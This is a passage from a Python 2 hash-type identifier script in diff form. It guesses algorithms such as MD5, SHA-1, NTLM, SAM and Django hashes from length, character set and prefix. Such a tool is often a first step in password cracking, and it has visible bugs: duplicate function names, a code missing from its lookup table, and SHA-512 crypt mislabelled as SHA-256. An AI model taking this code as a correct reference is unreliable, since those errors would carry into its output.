"110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + 